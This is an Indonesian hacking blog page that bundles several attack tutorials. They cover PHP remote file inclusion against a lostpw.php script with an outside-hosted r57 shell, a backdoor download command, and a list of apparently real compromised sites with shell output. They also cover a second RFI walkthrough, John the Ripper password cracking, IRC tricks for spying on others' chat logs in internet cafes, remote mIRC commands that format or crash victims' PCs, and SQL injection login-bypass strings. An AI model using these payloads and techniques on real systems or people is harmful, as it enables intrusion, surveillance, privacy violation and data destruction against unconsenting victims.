Minggu, 30 September 2007

cara inject lanjutan

Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan.
Hello World!

mungkin tutorial ini rada basi sih.. cma /me cma mo share azah!
anak2 demohacking pasti da pada tau..

PHP injection...

pertama2 kita buka google.com

kita memasuk kan keyword nya di sana...

keyword nya yg di maksudkan di sini adalah dork,.. [bisa di lihat di
millw0rm.com cari sendiri yg laen]

Kita mulai saja!

sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=
allinurl%3Aindex.php%3Fa%3Ddisplay



allinurl:index.php?a=display

allinurl <=- mencari setiap kata pada url...

index.php?a=display

sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=

http://www.historywebsites.com//index.php?a=display <=- tampil pada
google..

http://www.historywebsites.com// <=- victim domain

index.php?a=display <=- DORK... kata kunci pada google...

http://www.historywebsites.com/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=


wwww.[domain].com/[path]/[file]?[BUGS]=[injector]?


injektor nya ada di link..


Quote:
http://www.geocities.com/yogya_hack/becak.tar.gz


Quote:
http://evilarmy.hostcentric.com/becak.tar.gz


itu adalah r57

hmm....
kalau sudah masuk ke web nya.. jangan lupa pasang backdoor...
cara nya ..

lwp-download http://www.geocities.com/yogya_hack/becak.tar.gz;ls -lia

jgn lupa... letak kan file nya di direktory yg permission drwxrwxrwx

find . -type d -perm 777

cari dari direktori skr sebuah direktori lain yang bisa di tlis...


find . -type f -perm 777 <=- mencari file

find / -type d -perm 777 <=- mencari dari direktori / (root)

Quote:
Backdoor PHP

1. lwp-download http://www.geocities.com/yogya_hack/becak.tar.gz
2. mv becak.tar.gz door.php

Contoh Hasil Site backdoor:

http://www.target.com/[path]/door.php



okeh...
sekian dl..
sector clear!!

Thanks Goes To:
ZeTH a.k.a s3t4n [Big thanks for finding the bugs!]
^MoNgOnDoW^ [Big thanks for lending the room!]
YF Xcode Big Famz! [thanks for support!]
^F_C^ [you know me!]
and all crewz!
#Becak & B-H-T crewz Vaksin13 OoN_BoY [makes me smile all the time!]


ini ada beberapa contoh shell nya...
semoga masih berjalan!


Quote:

http://www.historywebsites.com/topsites/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.hostcentric.
com/becak.tar.gz? uid=48(apache) gid=48(apache) groups=48(apache),
2522(psaserv)

http://www.steroidsource.net/sources/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.hostcentric.
com/becak.tar.gz? uid=32211(wantflir) gid=32211(wantflir)
groups=32211(wantflir)

http://dreamweaver.net.ru/ex/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.hostcentric.
com/becak.tar.gz?

http://www.trsaga.com/top/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.hostcentric.
com/becak.tar.gz? uid=99(nobody) gid=99(nobody) groups=99(nobody)

http://www.clubbangaz.net/tpl/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.hostcentric.
com/becak.tar.gz? user=banga uid=1476 gid=812

http://www.gameserverlist.de/toplist/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.hostcentric.
com/becak.tar.gz? user=web5 uid=670 gid=104

http://www.r.kmdn.ru/sources/lostpw.php?FORM[set]=1&FORM[session_id]
=1&CONFIG[path]=http://www.evilarmy.hostcentric.com/becak.tar.gz?
user=kmdn-r uid=2422 gid=1754

http://www.bullterrier.kiev.ua/topsites/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.hostcentric.
com/becak.tar.gz? uid=99(nobody) gid=99(nobody) groups=99(nobody)

http://www.gurbetporthosting.com/GurbetPortList/sources/lostpw.php?
FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.
hostcentric.com/becak.tar.gz? user= uid= gid=643 save

http://a-z.az/top/sources/lostpw.php?FORM[set]=1&FORM[session_id]
=1&CONFIG[path]=http://www.evilarmy.hostcentric.com/becak.tar.gz?
user=a3544_1 uid=10130 gid=2524

http://vietcong.ath.cx/xampp/www/ucu/bannerlist//sources/lostpw.php?
FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.
hostcentric.com/becak.tar.gz? SYSTEM win

http://www.cityofgod.org/top/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.hostcentric.
com/becak.tar.gz? uid=99(nobody) gid=99(nobody) groups=99(nobody),
511(restricted)

http://top.mavit.kiev.ua/sources/lostpw.php?FORM[set]
=1&FORM[session_id]=1&CONFIG[path]=http://www.evilarmy.hostcentric.
com/becak.tar.gz?


om admin.. jgn di pindah yah.. seharus nya ada di atas itu...
hehehe
Pengenalan
----------
John the Ripper merupakan password cracker yang cepat. JTR tersedia
pada berbagai
platform baik *nix, DOS, win32. Tujuan utamanya adalah mendeteksi
kelemakan
password pada Unix. Tetapi JTR juga dapat mengcrack password pada Win
NT/2000/XP
yang berbentuk LM hashes.

Bagi yang belum mempunyai JTR, anda dapat download disini:
- http://www.openwall.com/john/


Ada beberapa hal penting pada JTR
[passfile] - Nama dari password file anda
[wordlist] - Kumpulan kata-kata
[output] - Hasi decrypt password
[session name] - Nama yang anda gunakan untuk menyimpan session

-- contoh Pasword File: passwd.txt --
root:VwL97VCAx1Qhs:0:0:root:/root:/bin/bash
user:aH0qcQOVz7e0s:515:100:user:/home/user:/bin/bash
lin:iWuSGrtezXz0E:515:100:lin:/home/lin:/bin/bash
-- contoh Pasword File: passwd.txt --

Note: Simpan [passfile] di folder yang sama dengan file execute JTR
Hal ini untuk mempermudah penggunaan JTR :)

Terdapat 3 mode pada JTR untuk mendecrypt password
1. Single Mode
Pada Single Mode, JTR akan berusaha mencari Password yang paling
lemah dari seluruh password. Cara ini merupakan cara yang paling
cepat.

Syntax single mode
- john -single [passfile]
atau
- john -si [passfile]

Co: Anda mempunyai password file passwd.txt
Maka penggunaannya : john -si passwd.txt

2. Wordfile Mode
Wordfile Mode merupakan cara tercepat ke 2. Wordfile Mode membutuhkan
kamus kata-kata.

Wordfile syntax
john -wordfile:[wordlist] [passfile]
atau
john -w:[wordlist] [passfile]

Co: Anda mempunyai password file passwd.txt dan mempunyai kamus kata words.lst
john -w:words.lst passwd.txt

3. Incremental Mode
Incremental Mode merupakan cara yang paling lambat dan berusaha untuk
mendecrypt semua password, akan memakan waktu berhari-hari, bermingu-minggu,
bahkan berbulan-bulan (berlebihan gak ya :p). Sebaiknya anda menggunakan
cara ini apabila 2 cara sebelumnya gagal.
Terdapat 4 perintah dasar dalam penggunaannya
a. digits: Akan mencoba mendecrypt semua password dengan karakter angka
b. alpha: Akan mencoba mendecrypt semua password dengan karakter huruf
c. all: Akan mencoba mendecrypt semua password dengan semua karakter
termasuk karakter spesial, co: @!^&?
d. tidak memilih mode: Akan mencoba mendecrypt password dengan segala cara

Syntax:
john -i [passfile]
john -i:DIGITS [passfile]
john -i:ALPHA [passfile]
john -i:ALL [passfile]

Co: Anda mempunyai password file passwd.txt
john -i passwd.txt
john -i:DIGITS passwd.txt
john -i:ALPHA passwd.txt
john -i:ALL passwd.txt


Mode lainnya pada JTR
- Show Mode
Setelah anda mendapatkan password yang telah di decrypt, anda dapat menyimpannya
pada file tertentu.

Syntax:
john -show [passfile]>[output]

Co: Anda mempunyai password file passwd.txt dan ingin menghasilkan output hasil.txt
john -show passwd.txt>hasil.txt

Anda juga dapat melihat langsung hasil decrypt dari JTR.

Syntax:
john -show [passfile]

Hasilnya terlihat seperti berikut:

root:root:0:0:root:/root:/bin/bash
user:company:515:100:user:/home/user:/bin/bash
lin:rootme:515:100:lin:/home/lin:/bin/bash
3 passwords cracked, 0 left


- Menghentikan JTR
Untuk menghentikan JTR anda dapat menekan CTRL+C


- Rules
Digunakan bersamaan dengan wordfile mode, tanpa rules JTR hanya akan mencoba
kata-kata yang terdapat pada wordlist. Apabila anda mengaktifkannya maka JTR
akan mencoba variasi dari kata2 pada wordlist.

Syntax
john w:[wordlist] -rules [passfile]


- Session & Restore
Mendecrypt password dapat memakan waktu sangat lama. Anda dapat menghentikan
JTR dengan CTRL+C, kemudian di lain waktu dapat dilanjutkan kembali dengan
syntax restore. Dengan melakukan hal tersebut akan membawa JTR kembali ke
session terakhir.

Syntax
john -restore
john -restore:[session name]
john -session:[session name]


- Saat melakukan cracking, JTR hanya menampilkan kursor yang berkedip.Apabila
anda ingin melihat sampai dimana JTR bekerja, anda dapat menekan "sembarang
tombol", JTR akan menampilkan status terakhir.


- Semua password yang pernah di crack disimpan JTR di john.pot


Anda bisa mendapatkan Wordfile di site-site berikut:
1. http://www.openwall.com/passwords/wordlists/

2. http://www.sparkleware.com/lists.html

3. http://ftp.cerias.purdue.edu/pub/dict/local/

4. ftp://sable.ox.ac.uk/pub/wordlists/

5. http://www.theargon.com/archives/wordlists/theargonlists/



Referensi AKA Bacaan:
1. Dokumentasi JTR
2. http://www.openwall.com/john/

3. http://securitysite.host.sk/jtr.html
Tips dan triks IRC ini sangat populer di kalangan chatter karena tips dan triks ini berisi cara melindungi identitas diri kita dari para chatter lainnya sekaligus juga dapat untuk mengetahui keberadaan teman chatting kita, memata-matai dia, melihat isi chattingan dia sampai meremote mIRC teman chatting kita tersebut.

Tips di IRC
Nih tips untuk para chatter IRC, mau tahu ?
Pertama-tama..
Sebelum anda memulai chatting dengan mIRC ada 3 hal yang sangat penting yang harus anda perhatikan :

1. Periksa Full name pada option Connect, gantilah Full name jika ada nama warnetnya tertulis

2. Periksa pada option Connect lalu pada identd, gantilah "user id" jika ada nomor room tertulis disini.

3. Periksa pada option IRC lalu pada Logging, gantilah menjadi "none" pada "automatically logs" jika posisi diluar itu.

4. Periksa pada Windows Task Manager apakah ada Keylogger terpasang :)

Tips diatas itu adalah kewaspadaan standard agar kita tidak mudah diketahui teman chatter kita.
Efek jika tidak menuruti tips diatas maka efeknya adalah :

1. jika "user id" tersebut memberi angka / nama room saat anda sedang chatting maka anda sama saja membuka diri

2. Jika pada logging bukan "none" maka bersiap-siaplah isi chattingan anda dilihat orang ketiga

3. Keylogger adalah program yang berbahaya jika terpasang, Ini yang cukup susah diperiksa jika tidak ada program scanner keylogger, tapi jika anda ingin memeriksanya tekan Ctrl+Alt+del, lihat list program yang sedang berjalan, jika ada nama program yang aneh dan asing berjalan maka matikan saja prosesnya tapi anda harus hati-hati dalam melakukanya, tapi dari semua itu anda tidak perlu resah karena kenyataanya sangat jarang ada user melakukan hal ini karena warnet-warnet saat ini telah dilengkapi program-program canggih untuk menangani hal beginian (restore).

Penulis :
Yogya Family Code

*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)

Tips tambahan di IRC
Tips tambahan khusus para chatter yang ingin menyembunyikan diri

Jika anda ingin chatting benar-benar tidak ingin ada yang tahu keberadaan anda maka anda bisa mengikuti tips kehati-hatian ini, karena memang kadang tips ini sering kali dilupakan karena memang tips ini sedikit gerah untuk dilaksanakan, tapi gak ada salahnya kan kita mencoba ?

1. Periksalah Quit Message pada menu pilihan IRC lalu messages, jika disitu muncul nama dan alamat warnet maka segera gantilah pesan itu dengan kalimat lain atau dikosongkan saja, karena jika anda mengaktifkannya maka pada saat keluar dari IRC maka pesan ini akan muncul di channel dan orang lain akan mengetahui dimana anda berada saat chatting.

2. Ssetelah keluar / disconnect dari mIRC, jangan lupa masuk mIRC lagi, dan segera ganti nama, e-mail, nickname alternative juga user id karena jika anda lupa menggantinya maka orang yang menggunakan komputer setelah anda akan mengetahui nama, e-mail, nickname,. alternativ dan user id anda.

3. Jangan lupa, jika anda sering copy paste, segera hilangkan memory copy paste anda dengan melakukan copy text lain untuk menghindari orang lain untuk mengetahui paste text anda.

Semoga informasi diatas dapat membantu dan menambah pengetahuan anda.

Penulis :
Yogya Family Code

*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)

Tips tambahan di IRC II
Tips agar kita tidak diremote atau dipermainkan di IRC

Sudah biasa banyak sekali spam di IRC yang menganggu contohnya ini :

WANNA BE OPERATOR #channel ?? copy/paste this-> < <== Jangan copy paste di mIRC anda kalau ada hal beginian karena dapat merusak / menyerang komputer anda (Sering ada di channel-channel besar, webmaster dah cek )
STOP SPAM copy/paste this-> <<== Ini juga sama saja

Cara menangani para cracker :

1. Periksalah remote mIRC anda caranya Tahan Alt lalu tekan R.
2. Biasanya mIRC-mIRC warnet dikosongkan remotenya tapi jika ada isinya lebuh baik delete remote yang sekiranya aneh (asing).
3. Periksa timer anda, caranya (ketik /timer ) jika misal ada timer yang bekerja ketik //!timers off
4. Menghilangkan decode :
Ketik kode ini di mIRC :

//!timers off | !ignore -r | !unload -rsn " $+ $chr(160) $+ . $+ $chr(160) $+ " | !remove " $+ $chr(160) $+ . $+ $chr(160) $+ " | !say $script($script(0))

Penulis :
Yogya Family Code

Referensi
rhega (OP #Yogyakarta)

Triks di IRC :
Cara agar bisa masuk ke dal.net dal.net dimana sebelumnya tidak bisa masuk karena trojan atau virus ?
masuklah ke irc.server.telkom.net.id setelah itu baru baru membuka server dal.net, jika masih tidak bisa maka anda harus mencari program scan antivirus dan trojan, anda dapat mendownloadnya berdasar referensi DAL.NET pada saat pesan terahkir connect.

Bagaimana cara melacak keberadaan teman chat kita ?
Whois saja chatter tersebut lalu cocokkan ip addreasnya dengan daftar ip addreas warnet Yogya di samping kanan. Jika ip addreas anda tidak ada dalam daftar maka anda dapat menggunakan pelacakan lain seperti http://www.apnic.org, :)

Bagaimana cara melacak boks warnet teman chat kita ?
Whois saja chatter tersebut lalu lihat sebelah kiri dari sebelum tanda "@ip addreas", jika ada angka maka kemungkinan besar dia di room tersebut, jika tidak ada maka periksa ip addreasnya apakah warnet tersebut menerapkan berbeda ip addreas tiap boks, jika iya maka hitunglah logika ip addreas tersebut sehingga ahkirnya dapat menemukan tempat boks teman chat anda.

Bagaimana kita ingin mencari teman chat di warnet sendiri (Hanya untuk channel yang memiliki BOT khusus !seen)?
D di channel #yogyakarta cukup ketikkan !seen *!*@ip addreas warnet anda, bisa juga dengan !seen nickname, fasilitas ini biasanya disediakan channel-channel besar tapi tidak menutep channel kecilpun mempunyai fasilitas ini.

Bagaimana kita ingin mencari teman chat di warnet sendiri ? (Dari perintah DAL.NET! Tidak perlu BOT channel)
/who #nama channel *@ip addreas warnet (cara ini sangat efektif jika BOT channel benar-benar memproteksi para chatter sehingga sangat membatasi informasi yang akan diberikan kepada anda).

Bagaimana kita ingin mencari nickname teman kita di channel #yogyakarta ?
cukup mudah, ketikkan di channel #yogyakarta !seen nickname teman kita.

Bagaimana cara kita memata-matai teman chat kita di satu warnet ? Masuklah di Network Neighboure lalu cari nomor room teman chat kita lalu masuklah di logs mirc teman kita biasanya di "c:\program files\mirc\logs".

Bagaimana cara kita meyakinkan bahwa teman chat kita disuatu room memang benar adanya memakai nickname yang kita maksud ?
Masuklah di Network Neighboure lalu cari nomor room teman chat kita lalu masuklah ke directory mirc teman kita biasanya di "c:\program files\mirc" lalu buka file mirc.ini. Jika anda mengalami masalah tiap komputer dipassword maka anda dapat memanfaatkan program Internet Maniac beserta PQwak, jika tiap komputer menggunakan Windows XP, tembus aja pakek KAHT yang bisa kamu download disini.

Proteksi diri di IRC dapat dilakukan dengan PSY dan Proxy tapi yang umum dan tidak memakan biaya adalah menggunakan proxy, bagaimana caranya ?
Carilah proxy di google, kemudian pastekan ke option mIRC yaitu pada "connect" lalu "firewall', firewall support diganti "server", protocol diganti "proxy" lalu tinggal anda isi hostname dan portnya sesuai dengan proxy yang anda dapatkan.

Referensi untuk mendapatkan proxy :

- http://www.proxyweb.net
- http://proxy.lessel.us/cgi-bin/nph-proxy.cgi
- http://www.multiproxy.org
- http://www.publicproxyservers.com/index.html
- http://www.hotscripts.com/Detailed/28480.html
- http://www.inetprivacy.com/a4proxy/anonymous-grc.htm
- http://www.sa6ry.com/surfanonymous/faq/hide-ip-address.html
- http://www.steganos.com (proxy)
- http://www.guardster.com (free proxy)
- http://www.anonymizer.com/index.cgi (proxy)
- http://www.orangatango.com/home/index.ie.html (proxy)
- http://proxify.com
- http://www.tehbox.com/proxy
- http://www.proxy4free.com/index.html
- http://www.stayinvisible.com/index.pl
- http://free-proxies.com

(Referensi Proxy dari Si Cebol, Indonewbies.tk)

Menampilkan ip-ip addreas para chatter di channel?

Pada Option lalu pilih IRC lalu aktifkan / centang pada Show Ip Addreasess

Penulis :
Yogya Family Code

*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)

Special triks di IRC :
Melihat seluruh isi chattingan teman kita disatu warnet walaupun komputer client / server tidak dishare sama sekali ! Luar biasa !
(Ilmu rahasia kreasi webmaster sendiri pada bulan November 2004)

Syarat untuk melakukan teknik memata-matai orang chatting di satu jaringan LAN (Local Area network) adalah sebagai berikut :

1. Menguasai MS-DOS dengan baik (Karena disini semua menggunakan DOS)
2. Punya logika yang baik dan dapat mengetik cepat (Karena disini anda dikejar dengan waktu dan membutuhkan pemikiran yang cepat)

Baiklah kita langsung saja, terapkan ilmu KaHT seperti ditutorial hacker lalu untuk masuk ke komputer sasaran, setelah anda masuk dikomputer tujuan, segera anda masuk ke MiRC komputer sasaran biasanya ada di c:\program files\mirc (ketik : "cd\progra~1\mirc") tapi ada juga yang di c:\mirc tapi sangat jarang, (ketik : "cd\mirc")

A. Untuk komputer yang drive D-nya di share :

Saat ini anda periksa apakah komputer sasaran drive d-nya dishare ? jika ya ikuti cara dibawah ini
jadi kodenya seperti dibawah ini kalau mau lengkap seperti ini

[dirs]
logdir=d:\

[options]
n1=5,100,0,0,0,0,0,0,0,1,0,1,1,1,1,1,1,1,0,0,1,1,1,0,5,0,0,0,0,0,1,0,0

setelah itu tekan ctrl + z untuk menyimpan, lalu tinggal anda masuk ke drive D komputer tersebut melalui LAN yang tentu saja sudah dishare, jadi cukup double klik aja files berekstensi log, lalu buka files itu pakek notepad untuk melihat terus isi chattingannya.

Jadi kesimpulannya yang membuat penyimpanan file log di drive D karena perintah :

[dirs]
logdir=d:\

Jika anda bingung dalam menghitungkan angkanya diatas, ini urutannya untuk mempermudah:
1. 5=1x
2. 100=1x
3. 0=7x
4. 1=1x
5. 0=1x
6. 1=7x
7. 0=2x
8. 1=3x
9. 0=1x
10. 5=1x
11. 0=5x
12. 1=1x
13. 0=2x

B. Untuk komputer sasaran tidak dishare :

Setelah anda membaca cara A Lalu sekarang bagaimana jika drive d tidak dishare ? tidak masalah ! kita tetap bisa mengikuti isi chattingan dia, caranya seperti diawal tadi yaitu cari dahulu program mIRC komputer sasaran yang biasanya ada di c:\program files\mirc (ketik : "cd\progra~1\mirc") tapi ada juga yang di c:\mirc tapi sangat jarang, (ketik : "cd\mirc")

Setelah kita masuk didirektory MiRC, ketik "del mirc ini" setelah itu ketik "copy con mirc.ini" lalu ketik kode rekam mirc.ini dibawah ini :

[options]
n1=5,100,0,0,0,0,0,0,0,1,0,1,1,1,1,1,1,1,0,0,1,1,1,0,5,0,0,0,0,0,1,0,0

setelah itu tekan ctrl + z untuk menyimpan, lalu silahkan tengok di "c:\progra~1\mirc\logs" cara melihat cukup ketik "type nickname.log*
* : Nickname diisi nick orang

Luar biasa buka, ingat sebagai catatan, Agar teknik berjalan baik maka teknik ini dilakukan / diterapkan pada semua boks warnet sebelum chatter tersebut chatting diboks tersebut, atau kalau udah terlanjut dia chatting di boks tersebut maka diset rekam aja MiRCnya gpp, sapa tahu MiRCnya error lalu dia buka lagi, :)

Dari tutorial ini maka dimanapun anda berada, semua isi chatting anda dapat dilihat orang walaupun anda tidak menyadarinya, "anda tidak melihat kami tapi kami melihat anda" :))

Penulis :
Yogya Family Code

*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)

Remote IRC (Mengontrol 100% segala chattingan user)

ketikkan perintah "ctcp *:*:?:$1-" ke dalam remote mIRC sasaran lalu masukan juga di dalam variables "%master Nick_kamu".

Perintah mengontrol komputer target :

/ctcp run rundll user,#7 : Melakukan Shutdown komputer sasaran
/ctcp run rundll user,#3 : Membuat Crash / Hang komputer sasaran
/ctcp run rundll user,#4 : Mengacaukan tampilan yang ahkirnya komputer sasaran Crash /Hang
/ctcp run format /y : Melakukan format pada komputer sasaran
/ctcp run http://.com : Membuka situs sesuai keinginan kamu
/ctcp /nick : Mengganti nick mIRC sasaran
(Perintah lainnya dapat dilihat di Peritah DAl.NET)

Penulis :
Yogya Family Code

Referensi :
1. Jasakom.com

*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)

Kedasyatan Hennes Script NW v0.61 IRC
Hennes Script NW v0.61 IRC : Download hennes Script NW v0.61

Percayakah anda bahwa dengan script ini anda bisa mendapatkan puluhan kenalan baru bahkan mungkin ratusan dengan hitungan menit ? Anda harus coba jika anda sering mencari teman lewat Via IRC, karena script ini benar-benar hebat dalam melakukan mengirim pesan ke chatter-chatter, dan selain itu juga juga bisa diandalkan untuk inviter dan advertising apa saja, wow! Lalu apa yang membuat kemampuan script ini begitu hebat ? dan bagaimana cara kerjanya ? apa kelemahannya ?

Script ini mampu memberikan pesan ke seluruh chatter dalam 1 channel meskipun anda langsung di ban oleh AOP, SOP bahkan founder waktu anda mengirim pesan oleh chatter-chatter, tapi pesan anda ke chatter tersebut tidak akan hilang / atau berhenti, tapi pengiriman pesan terus berjalan, bayangkan, apa kurang hebat ? tapi script ini mempunyai kelemahan yaitu kemampuan ini tidak akan berjalan jika anda masuk ke channel besar kayak #jakarta, #bandung, #yogyakarta, #solo, #semarang dan sebagainya, mengapa ? karena bagaimana mungkin kita chatting dengan semua orang di channel dalam 1 - 2 detik. jelas langsung disconect, cocoknya script ini dijalankan di channel yang ga begitu rame kaya #manado, #purwokerto, #yogya (kalo pas sepi) dan sebagainya.

Sebelum kita memulai saran webmaster masuklah di Option dahulu untuk mengganti themenya menjadi MIRC, tapi kalau anda tidak ingin itu juga bukan masalah untuk percobaan script ini.

Bagaimana cara menjalankan fasilitas ini ?
Pada saat anda sudah connect ke dal.net dan masuk channel maka segera klik kanan saja pada room channel, lalu pilih pilihan other dan klik pada pilihan Send private message to everyone, dan tulis aja pesannya, nanti para chatter jika menjawab maka anda akan terasa di ajak chat duluan, hehe :)

Sebenarnya banyak program-program luar biasa lainnya yang musti di punyai oleh anda para member, hanya saja family code disini memberikan informasi langka yang programnya ga ada di rental CD manapun di pelosok tanah air, menurut surfey Family Code, program-program hacker dan pemecah password udah banyak sekali di rental-rental CD seperti Passware Kit, trojan, backdoor dan lain-lainnya dan tentu saja semuanya bisa anda mudah dapatkan dengan sedikit money, jika anda merasa malas ke rental maka anda dapat langsung ke google aja mencari programnya, banyak banget, www.jasakom.com adalah sumber ilmu yang dapat anda pelajari sendiri.

Penulis :
Yogya Family Code

*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)
Mengenal shell exploite inject
Mungkin anda masih merasa bingung dengan shell exploite inject pada web tapi pada dasarnya semua shell sama saja cuma yang membedakan cara pemakaian shell atau bentuk dari shell itu sendiri apa berbasis aplikasi atau berbasis website tapi namanya shell jelas command - command masih sama mungkin misalkan pada shell yang aplikasi servernya berbasis linux jelas perintah yang digunakan berbasis linux juga. nah kali ini saya akan membahas tentang shell inject yang jelas saja berbasis website karena pada umumnya orang - orang memakai shell ini dalam dunia IRC biasa disebut dengan kalimat “target” saya juga heran mengapa dinamakan target? mungkin karena sudah kebiasaan padahal namanya shell inject.

Bagai mana cara mendapatkan shell tersebut?..
Mudah saja hanya dengan meman faatkan bugs bugs pada script web tersebut biasanya itu semua kelalaian dari pemakai web yang mempunyai bugs nah dalam pencarian shell inject berbasis web ini ada bermacam cara - cara injected tapi saya akan membahas cara inject dengan Remote File Inclusion Vulnerability itu menggunakan bugs dalam file script pada website yang akan di inject

Bagai mana cara melihat bugs pada suatu script aplikasi pada website?..
Hanya dengan menggunakan rumus logika panggilan data (include,require) ditambah dengan variabel pada script tersebut inlclude + $variabel semua memakai rumus seperti itu contoh script


($docroot.'/FCDIRECTORY/fc_functions/fc_functions.php');

?>

require <--- panggilan data

$docroot <--- variabel

/FCDIRECTORY/fc_functions/fc_functions.php <---

directory dan file dimana ditemukan bugs
(kerusakan atau kelemahan)

jelas pada script di atas kelihatan bugs jika dikaitkan dengan rumus include+variabel maka akan menjadi suatu shell inject tinggal kita mengolah script tersebut.

sekarang kita akan membentuk suatu script yang sebentar akan dikaitkan dengan link pada website degan cara memutar balikan script tersebut dengan mengubah kedudukan include dan variabel serta mengubah variabel yang dikenal tanda “$” menjadi “?”

$docroot.'/FCDIRECTORY/fc_functions/fc_functions.php

jika diputar balikan akan menjadi

/FCDIRECTORY/fc_functions/fc_functions.php?docroot=

Kaitan Bugs dan Link pada Website
Ini merupakan saat yang paling enak dipelajari apa kaitan bugs dengan link pada website atau target website yang akan kita masuk. Jelas kaitanya sangat erat dan wajib untuk diperlakukan. Mengapa?..karena tanpa bugs tersebut kita tidak bisa mendapatkan shell inject kita akan masuk pada website melalui bugs atau kelemahan pada website tersebut dimana letak kelemahan website tersebut?..letaknya ada pada script bugs


require

($docroot.'/FCDIRECTORY/fc_functions/fc_functions.php');

?>

sekarang kita akan menggabungkan link website dengan bugs tapi sebelumnya kita harus mempunyai injection atau code shell php anda bisa dapatkan pada link www.andi-a.biz/tools/shell.txt? atau www.andi-a.biz/tools/r57.txt?
nah sekarang akan kita gabungkan akan menjadi seperti

/FCDIRECTORY/fc_functions/
fc_functions.php?docroot=[shell code]

contoh:

www.site.com/[path]/FCDIRECTORY/fc_functions/
fc_functions.php?docroot=[shell code]

gunakan shell code :

www.andi-a.biz/tools/shell.txt?

contoh :

fc_functions.php?docroot=www.andi-a.biz/tools/shell.txt?

jika sudah menjadi seperti itu kita tinggal mencari target website yang siap kita masuk biasanya pencarian target website lewat situs pencarian seperti yahoo,google,altavista,lycos dan masih banyak lagi atau bisa menggunakan bot scan perl lewat IRC (yang menggunakan bot scan kerjaan orang malas) namun apa salahnya jika teknologi semakin berkembang menggapa tidak jika kita menggunakan sesuatu yang akan mempermudah pekerjaan kita

Screenshot Shell Inject

tampilan shell code

shell1.gif

tampilan list directory shell code

shell2.gif
SQL singkatan dari Structured Query Language yg merupakan bahasa komputer standar yg ditetapkan oleh ANSI (American National Standard Institute) untuk mengakses dan memanupulasi sistem database. SQL bekerja dgn program2 database seperti MS Access, DB 2, Informix, MS SQL Server, Oracle, Sybase dan lain sebagainya.

SQL Injection attack merupakan salah satu teknik dalam melakukan web hacking utk menggapai akses pada sistem database yg berbasis SQL. Teknik ini memanfaatkan kelemahan dalam bahasa pemprograman scripting pada SQL dalam mengolah suatu sistem database. Hasil yg ditimbulkan dari teknik ini membawa masalah yg sangat serius. Mengapa disebut SQL Injection ? seperti yg kita ketahui, injection jika diartikan ke dalam bahasa Indonesia yaitu "suntikan". Yang terjadi memang seperti melakukan suntikan terhadap SQL yg tujuannya adalah tergantung kepada pelakunya dan pada intinya jika disalahgunakan maka akan membawa aspek negatif terhadap korban.

Sudah disinggung diatas bahwa SQL Injection attack memanfaatkan kelemahan dalam bahasa pemprograman scripting pada SQL maksudnya adalah memanfaatkan teknik string building untuk mengeksekusi/menjalankan kode SQL. Jadi prinsip dasar SQL Injection sebenarnya memanfaatkan kode insecure (tidak aman) atas sebuah sistem yg terhubung ke internet dalam upaya melangkahi command (perintah) dan secara langsung menuju ke database untuk kemudian mengambil keuntungan dari sistem yg dijamin aman untuk melakukan pengambilan atau pengubahan atau lain sebagainya oleh penyerang.

Keuntungan yg diambil adalah seperti login akses terhadap server yg bukan haknya atau yg lainnya, tergantung kepada penyerangnya.

Input Query String

Default setting dari SQL menggunakan :

adminID = sa

password ='' (kosong atau blank)

misalnya : http://www.target.com/login.asp?adminID=sa%20password=''

%20 artinya menggantikan "jarak spasi"

Ini merupakan kondisi yg berbahaya jika pengubahan setting tidak segera dilakukan.

Verifikasi yg dilakukan oleh SQL disaat pemakai memasukkan username dan password adalah seperti yg terlihat pada teks sebagai berikut :

SQLQuery="SELECT Username FROM Users WHERE Username="'&strUsername&"'strpassword&"'

Pada verifikasi terdapat kelemahan pada pemprosesan pada string2 tertentu yg sebenarnya string tersebut dapat dikatakan sebagai input ilegal. Verifikasi tetap melakukan proses dan nantinya menghasilkan error page. Error page tersebut justru membuka rahasia struktur database dan bahkan error page tetapi eksekusi terhadap validasi input tetap dijalankan.

Contoh : menggunakan injection string 'OR''= pada username maupun password baik dilakukan dgn metode URL input query string maupun Box input query string maka SQL query akan membacanya sebagai berikut :

SELECT Username FROM Users WHERE Username=''OR''='' AND Password=''OR''=''

Maka yg terjadi adalah SQL query akan menyatakan blank username dan blank password sebagai user yg sah (valid). SQL Injection yg berhasil dilakukan akan ditandai dgn munculnya error page dgn error yg dimunculkan dapat berupa ODBC error, internal server error, syntax error dan lain sebagainya.

Ada banyak variasi dari injection string yg dapat digunakan untuk melakukan SQL Injection :

'or 1=1--

'or 0=0 --

'or 'x'='x

'or a=a-

"or 0=0 --

"or 0=0 #

"or "x"="x

")or("a"="a

admin'--

hi" or 1=1 --

hi' or'a'='a

hi")or("a"="a

or 0=0 #

'or a=a--

'or 0=0 #

'having 1=1--

"or 1=1--

"or "a"="a

')or('a'='a

')or('x'='x

hi" or "a"="a

hi' or 1=1 --

hi')or('a'='a

or 0=0 --

or 1=1--

